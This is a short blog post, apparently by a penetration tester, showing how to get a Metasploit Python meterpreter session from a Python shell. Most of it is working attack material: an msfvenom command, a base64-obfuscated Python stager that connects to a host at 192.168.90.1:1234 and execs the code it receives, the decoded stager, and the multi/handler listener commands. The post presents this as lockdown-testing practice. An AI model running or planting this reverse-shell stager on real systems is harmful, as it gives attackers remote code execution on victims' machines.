So not so recently support was added to metasploit for a native python meterpreter. The cool thing about this is that the victim only needs to execute a few small lines of code.

This means that if you’re performing a local lockdown test and manage to get access to a python shell it wont take much more effort to turn this into a meterpreter session.

1
2
msfvenom -f raw -p python/meterpreter/reverse_tcp LHOST=192.168.90.1 LPORT=1234
import base64; exec(base64.b64decode('aW1wb3J0IHNvY2tldCxzdHJ1Y3QKcz1zb2NrZXQuc29ja2V0KDIsMSkKcy5jb25uZWN0KCgnMTkyLjE2OC45MC4xJywxMjM0KSkKbD1zdHJ1Y3QudW5wYWNrKCc+SScscy5yZWN2KDQpKVswXQpkPXMucmVjdig0MDk2KQp3aGlsZSBsZW4oZCkhPWw6CglkKz1zLnJlY3YoNDA5NikKZXhlYyhkLHsncyc6c30pCg=='))

This is just simply python code that is base64 encoded:

1
2
3
4
5
6
7
8
import socket,struct
s=socket.socket(2,1)
s.connect(('192.168.90.1',1234))
l=struct.unpack('>I',s.recv(4))[0]
d=s.recv(4096)
while len(d)!=l:
    d+=s.recv(4096)
exec(d,{'s':s})"

Then you just need to set up the listener within metasploit and hey presto!

1
2
3
4
msf3> use exploit/multi/handler
msf3> set payload python/meterpreter/reverse_tcp
msf3> set LHOST 192.168.90.1
msf3> exploit

Leave a Reply